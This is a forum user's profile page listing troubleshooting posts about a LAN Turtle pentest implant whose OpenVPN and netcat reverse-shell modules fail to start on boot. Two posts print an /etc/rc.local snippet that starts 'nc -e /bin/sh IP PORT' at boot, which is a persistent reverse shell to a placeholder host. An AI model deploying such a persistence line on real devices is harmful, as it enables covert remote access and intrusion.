-
Content Count
8 -
Joined
-
Last visited
About scavmartin
-
Rank
Hackling
Recent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
-
Sorry I forgot to mention I did try to do a /etc/rc.d/S99openvpn symlink to /etc/init.d/openvpn and it did not work. Figured I would mention in case someone else tries that method for services to start on boot.
-
Thanks for the data, in case it helps you can achieve the same result by just editing /etc/rc.local and adding the commands you want to start on boot there. Note there is no service or systemctl on the turtle. So my /etc/rc.local looks like the following to start a nc reverse shell and a openvpn /etc/init.d/openvpn start #sh reverse shell nc -e /bin/sh IP PORT #Add your commands above this line exit 0
-
See the following threads, It appears a lot of the modules start on boot does not work. A workaround for anyone reading this is to add the command in /etc/rc.local For example I enable OpenVPN and start a nc reverse shell and my /etc/rc.local looks like this. Note there is no service or systemctl on the turtle /etc/init.d/openvpn start #sh reverse shell nc -e /bin/sh IP PORT #Add your commands above this line exit 0
-
I think the issue is more widespread as netcat-revshell does not start on boot either for me and I followed this other issue. My openvpn does start manually and through init.d as well.
-
I have configured my netcat-revshell on my turtle lan. The netcat-revshell works fine if I manually start it in the menu. I have set the Bootup Status to Enabled. I reboot the turtlelan and netcat-revshell does not start, viewing the menu it confirms that Bootup Status is Enabled and the Current Status is stopped. If I click on Start the netcat-revshell starts up and works as expected. But I cannot get netcat-revshell to start on bootup even though it is configured to. I am on v2 and no updates are available as of today. May be related to "OpenVPN does not start on boot" -
-
Sorry forgot to mention I am on v2 and no updates are available as of today.
-
If you click on stop once openvpn is running you get "Command failed: Not found" for an error and the openvpn is still started. I am on v2 and no updates are available as of today.
-
I have configured my openvpn on my turtle lan. The openvpn works fine if I manually start it in the menu or issue a /etc/init.d/openvpn start command. I have set the Bootup Status to Enabled. I reboot the turtlelan and openvpn does not start, viewing the menu it confirms that Bootup Status is Enabled and the Current Status is stopped. If I click on Start the openvpn starts up and works as expected. But I cannot get openvpn to start on bootup even though it is configured to. Side note: If you click on stop after start you get "Command failed: Not found" for an error and the openvpn